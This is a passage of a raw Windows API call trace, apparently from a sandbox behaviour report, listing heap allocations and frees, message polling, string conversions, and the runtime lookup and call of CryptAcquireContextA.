hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0164.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0164.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0164.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.751] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0164.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0164.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0164.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0164.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.752] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0164.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0164.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0164.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0164.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.753] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0164.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0164.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.755] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0164.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0164.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0164.755] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0164.756] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0164.756] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.756] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0164.756] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.756] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.756] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.756] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.756] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.756] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0164.757] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0164.757] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0164.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0164.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.757] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0164.757] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.757] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0164.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0164.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.757] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.757] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.760] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0164.760] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.761] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0164.761] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0164.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.761] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0164.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.762] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0164.762] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.762] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0164.762] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.763] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0164.763] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.763] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.763] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.763] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.763] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.763] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.763] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.764] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0164.764] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.764] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0164.764] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.764] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.764] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.764] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0164.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.765] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.765] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.765] RtlAllocateHeap 